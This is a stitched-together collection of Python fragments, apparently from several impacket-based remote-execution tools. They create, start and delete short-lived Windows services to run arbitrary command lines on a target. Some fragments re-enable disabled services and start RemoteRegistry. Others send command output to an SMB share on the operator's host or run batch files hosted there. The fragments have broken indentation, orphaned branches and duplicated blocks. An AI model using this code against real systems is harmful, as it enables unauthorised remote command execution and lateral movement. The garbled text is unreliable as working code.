else:
lmhash = ''
nthash = ''
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(self.username,self.password, self.domain, lmhash, nthash)
dce = rpctransport.get_dce_rpc()
#dce.set_max_fragment_size(32)
dce.connect()
if self.__class__.__name__ == 'TCPTransport':
dce.set_auth_level(ntlm.NTLM_AUTH_PKT_PRIVACY)
dce.bind(scmr.MSRPC_UUID_SCMR)
#rpc = scmr.DCERPCSvcCtl(dce)
lpMachineName = 'DUMMY\x00'
lpDatabaseName = 'ServicesActive\x00'
desiredAccess = scmr.SERVICE_START | scmr.SERVICE_STOP | scmr.SERVICE_CHANGE_CONFIG | scmr.SERVICE_QUERY_CONFIG | scmr.SERVICE_QUERY_STATUS | scmr.SERVICE_ENUMERATE_DEPENDENTS | scmr.SC_MANAGER_ENUMERATE_SERVICE
resp = scmr.hROpenSCManagerW(dce,lpMachineName, lpDatabaseName, desiredAccess)
scHandle = resp['lpScHandle']
return dce, rpctransport, scHandle
def connect(self):
    """Make sure the RemoteRegistry service is running on the target.

    Opens the service control manager through connect_scmr(), opens the
    RemoteRegistry service, issues a start request (an "already running"
    error is treated as success) and records the outcome in
    self.rrpStarted so the work happens at most once per instance.

    Raises:
        Whatever scmr raises for the open or start calls, except the
        ERROR_SERVICE_ALREADY_RUNNING case which is swallowed.
    """
    if self.rrpStarted is not True:
        dce, rpctransport, scHandle = self.connect_scmr()
        # Access mask requested on the service handle. Only SERVICE_START is
        # exercised below; the rest is broader than this method needs.
        desiredAccess = scmr.SERVICE_START | scmr.SERVICE_STOP | scmr.SERVICE_CHANGE_CONFIG | \
            scmr.SERVICE_QUERY_CONFIG | scmr.SERVICE_QUERY_STATUS | scmr.SERVICE_ENUMERATE_DEPENDENTS
        resp = scmr.hROpenServiceW(dce, scHandle, 'RemoteRegistry\x00', desiredAccess)
        # Debug leftover: prints the decoded RPC response on every connect.
        resp.dump()
        serviceHandle = resp['lpServiceHandle']
        try:
            resp = scmr.hRStartServiceW(dce, serviceHandle )
        except Exception as e:
            # Matches on the error *text*, not the error code; a reworded or
            # localized message would turn a benign condition into a raise.
            if str(e).find('ERROR_SERVICE_ALREADY_RUNNING') >=0:
                pass
            else:
                raise
        # Only the SCM handle is closed here; serviceHandle is left open, and
        # nothing in this method stops the service it started.
        resp = scmr.hRCloseServiceHandle(dce, scHandle)
        self.rrpStarted = True
self.__scmr = rpc.get_dce_rpc()
try:
self.__scmr.connect()
except Exception as e:
logging.critical(str(e))
sys.exit(1)
s = rpc.get_smb_connection()
# We don't wanna deal with timeouts from now on.
s.setTimeout(100000)
if mode == 'SERVER':
myIPaddr = s.getSMBServer().get_socket().getsockname()[0]
self.__copyBack = 'copy %s \\\\%s\\%s' % (self.__output, myIPaddr, DUMMY_SHARE)
self.__scmr.bind(scmr.MSRPC_UUID_SCMR)
resp = scmr.hROpenSCManagerW(self.__scmr)
self.__scHandle = resp['lpScHandle']
self.transferClient = rpc.get_smb_connection()
self.do_cd('')
def createService(self, handle, share, path):
LOG.info("Creating service %s on %s....." % (self.__service_name, self.connection.getRemoteHost()))
# First we try to open the service in case it exists. If it does, we remove it.
try:
resp = scmr.hROpenServiceW(self.rpcsvc, handle, self.__service_name+'\x00')
except Exception as e:
if str(e).find('ERROR_SERVICE_DOES_NOT_EXIST') >= 0:
# We're good, pass the exception
pass
else:
raise e
else:
# It exists, remove it
scmr.hRDeleteService(self.rpcsvc, resp['lpServiceHandle'])
scmr.hRCloseServiceHandle(self.rpcsvc, resp['lpServiceHandle'])
# Create the service
command = '%s\\%s' % (path, self.__binary_service_name)
try:
resp = scmr.hRCreateServiceW(self.rpcsvc, handle,self.__service_name + '\x00', self.__service_name + '\x00',
lpBinaryPathName=command + '\x00', dwStartType=scmr.SERVICE_DEMAND_START)
def __executeRemote(self, data):
    """Run *data* on the target by installing and starting a throwaway service.

    Builds a batch file whose single line redirects the command's output to
    self.__output, registers the whole command line as the binary path of a
    randomly named service, starts that service once and deletes it.
    Output collection is done elsewhere; this method only triggers execution.

    Args:
        data: command line to run on the remote host. It is embedded verbatim
            in a cmd.exe line; nothing here quotes or escapes it.
    """
    # Random 8-letter service name, UTF-16LE encoded because the SCMR helpers
    # are handed wide strings here. NOTE: string.letters exists only on
    # Python 2 (string.ascii_letters is the portable name).
    self.__tmpServiceName = ''.join([random.choice(string.letters) for _ in range(8)]).encode('utf-16le')
    # The carets escape '>' so that "<data> > <output>" is written *into* the
    # batch file; the shell then runs the batch file and deletes it.
    command = self.__shell + 'echo ' + data + ' ^> ' + self.__output + ' > ' + self.__batchFile + ' & ' + \
        self.__shell + self.__batchFile
    command += ' & ' + 'del ' + self.__batchFile
    # Presumably read by cleanup code on the caller's error path to decide
    # whether the service still needs removing -- confirm against caller.
    self.__serviceDeleted = False
    # The full command line is the service's lpBinaryPathName. NOTE(review):
    # the create/start/delete sequence is the artifact a defender sees; the
    # service is not hidden, only short-lived.
    resp = scmr.hRCreateServiceW(self.__scmr, self.__scManagerHandle, self.__tmpServiceName, self.__tmpServiceName,
                                 lpBinaryPathName=command)
    service = resp['lpServiceHandle']
    try:
        scmr.hRStartServiceW(self.__scmr, service)
    except:
        # Bare except: every start failure (access denied, broken transport,
        # even KeyboardInterrupt) is silently ignored. `except Exception:`
        # would be the minimum narrowing.
        pass
    scmr.hRDeleteService(self.__scmr, service)
    self.__serviceDeleted = True
    scmr.hRCloseServiceHandle(self.__scmr, service)
command = self.__shell + data + ' ^> \\\\{}\\{}\\tmp\\{}'.format(local_ip, alea, self.__output)
else:
command = self.__shell + data
with open(os.path.join(os.path.dirname(os.path.realpath(sys.argv[0])), 'misc', 'tmp', self.__batchFile), 'w') as batch_file:
batch_file.write(command)
logging.debug("%sHosting batch file with command: %s" % (debugBlue, command))
command = self.__shell + 'net use \\\\{}\\{} /persistent:no /user:{} {} & \\\\{}\\{}\\tmp\\{} & net use \\\\{}\\{} /del'.format(local_ip, alea, alea, alea, local_ip, alea, self.__batchFile, local_ip, alea)
logging.debug("%sCommand to execute: %s" % (debugBlue, command))
logging.debug("%sRemote service %s created." % (debugBlue, self.__serviceName))
resp = scmr.hRCreateServiceW(self.__scmr, self.__scHandle, self.__serviceName, self.__serviceName, lpBinaryPathName=command, dwStartType=scmr.SERVICE_DEMAND_START)
service = resp['lpServiceHandle']
try:
logging.debug("%sRemote service %s started." % (debugBlue, self.__serviceName))
scmr.hRStartServiceW(self.__scmr, service)
except:
pass
logging.debug("%sRemote service %s deleted." % (debugBlue, self.__serviceName))
scmr.hRDeleteService(self.__scmr, service)
scmr.hRCloseServiceHandle(self.__scmr, service)
self.get_output_fileless()
def __scmr_connect(self):
    '''
    Connect to svcctl named pipe

    Opens the SMB transport to the svcctl pipe, binds DCE/RPC to the SCMR
    interface and opens the service control manager, keeping the manager
    handle in self.__mgr_handle for later service calls.
    '''
    self.smb_transport('svcctl')
    self.__dce = self.trans.get_dce_rpc()
    # No set_auth_level() call on this binding: RPC confidentiality rests
    # entirely on the underlying SMB session.
    self.__dce.bind(scmr.MSRPC_UUID_SCMR)
    # Same object under a second attribute name; presumably kept for callers
    # that still use self.__rpc -- confirm before removing.
    self.__rpc = self.__dce
    # hROpenSCManagerW is called with impacket's default arguments, so the
    # access mask is whatever that helper requests by default, not narrowed here.
    self.__resp = scmr.hROpenSCManagerW(self.__dce)
    self.__mgr_handle = self.__resp['lpScHandle']
self.__shouldStop = True
self.__started = False
elif ans['lpServiceStatus']['dwCurrentState'] == scmr.SERVICE_RUNNING:
logging.debug('Service %s is already running'% self.__serviceName)
self.__shouldStop = False
self.__started = True
else:
raise Exception('Unknown service state 0x%x - Aborting' % ans['CurrentState'])
# Let's check its configuration if service is stopped, maybe it's disabled :s
if self.__started is False:
ans = scmr.hRQueryServiceConfigW(self.__scmr,self.__serviceHandle)
if ans['lpServiceConfig']['dwStartType'] == 0x4:
logging.info('Service %s is disabled, enabling it'% self.__serviceName)
self.__disabled = True
scmr.hRChangeServiceConfigW(self.__scmr, self.__serviceHandle, dwStartType = 0x3)
logging.info('Starting service %s' % self.__serviceName)
scmr.hRStartServiceW(self.__scmr,self.__serviceHandle)
sleep(1)
elif ans['lpServiceStatus']['dwCurrentState'] == scmr.SERVICE_RUNNING:
logging.debug('Service %s is already running' % self.__serviceName)
self.__shouldStop = False
self.__started = True
else:
raise Exception('Unknown service state 0x%x - Aborting' % ans['CurrentState'])
# Let's check its configuration if service is stopped, maybe it's disabled :s
if self.__started is False:
ans = scmr.hRQueryServiceConfigW(self.__scmr, self.__serviceHandle)
if ans['lpServiceConfig']['dwStartType'] == 0x4:
logging.info('Service %s is disabled, enabling it' % self.__serviceName)
self.__disabled = True
scmr.hRChangeServiceConfigW(self.__scmr, self.__serviceHandle, dwStartType=0x3)
logging.info('Starting service %s' % self.__serviceName)
scmr.hRStartServiceW(self.__scmr, self.__serviceHandle)
time.sleep(1)
def execute_remote(self, data):
    """Run *data* on the target through a one-shot service and fetch its output.

    Writes the command into a batch file that redirects both stdout and
    stderr to self.__output, runs it via self.__shell, optionally copies the
    output back (SERVER mode), deletes the batch file, installs that whole
    command line as a service, starts it once, removes the service and then
    calls get_output().

    Args:
        data: command line to execute on the remote host. It is embedded
            verbatim in a cmd.exe line, so the caller is responsible for
            any quoting.
    """
    # The carets escape the redirections so "<data> > <output> 2>&1" is
    # written *into* the batch file rather than applied to the echo itself.
    command = self.__shell + 'echo ' + data + ' ^> ' + self.__output + ' 2^>^&1 > ' + self.__batchFile + ' & ' + \
        self.__shell + self.__batchFile
    if self.__mode == 'SERVER':
        # Presumably a 'copy <output> \\<host>\<share>' command prepared at
        # connect time -- confirm against the initializer.
        command += ' & ' + self.__copyBack
    command += ' & ' + 'del ' + self.__batchFile
    # The complete command line, including the remote output path, lands in
    # the debug log.
    logging.debug('Executing %s' % command)
    # Create, start, delete: the service exists only for the duration of
    # this call, but the install itself is visible on the target.
    resp = scmr.hRCreateServiceW(self.__scmr, self.__scHandle, self.__serviceName, self.__serviceName,
                                 lpBinaryPathName=command, dwStartType=scmr.SERVICE_DEMAND_START)
    service = resp['lpServiceHandle']
    try:
        scmr.hRStartServiceW(self.__scmr, service)
    except:
        # Bare except: any start failure (access denied, broken transport,
        # even KeyboardInterrupt) is ignored and get_output() runs regardless.
        # `except Exception:` would be the minimum narrowing.
        pass
    scmr.hRDeleteService(self.__scmr, service)
    scmr.hRCloseServiceHandle(self.__scmr, service)
    self.get_output()